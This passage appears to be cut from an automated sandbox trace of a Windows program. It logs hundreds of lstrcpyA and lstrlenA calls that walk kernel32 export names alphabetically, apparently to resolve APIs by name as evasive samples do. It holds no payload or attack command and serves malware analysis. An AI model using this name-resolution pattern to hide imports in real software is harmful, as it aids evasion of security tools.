returned 10 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.988] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.988] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.989] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.989] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.989] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.989] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.989] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.989] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.989] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.989] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.989] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.989] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.989] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.989] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.989] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.989] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.989] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.989] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.989] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.989] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.989] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.990] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.990] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.990] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.990] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.990] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.990] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.990] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.990] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.990] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.990] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.990] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.990] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.990] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.990] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.990] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.990] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.990] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.990] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.990] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.990] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.991] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.991] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.991] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.991] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.991] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.991] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.991] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.991] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.991] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.991] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.991] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.991] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.991] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.991] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.991] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.991] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.991] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.991] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.991] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.991] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.992] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.992] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.992] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.992] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.992] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.992] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.992] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.992] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.992] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.992] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.992] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.992] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.992] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.992] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.992] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.992] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.992] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.992] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.992] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.993] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.993] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.993] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.993] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.993] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.993] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.993] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.993] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.993] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.993] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.993] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.994] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.994] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.994] lstrlenA (lpString="DELETEATOM") returned 10 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.994] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.994] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.994] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.994] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.994] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.994] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.994] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.994] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.994] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.994] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.994] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.994] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.994] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.994] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.994] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.994] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.995] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.995] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.995] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.995] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.995] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.995] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.995] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.995] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.995] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.995] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.995] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.995] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.995] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.995] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.995] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.995] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.995] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.996] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.996] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.996] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.996] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.996] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.996] lstrcpyA (in: 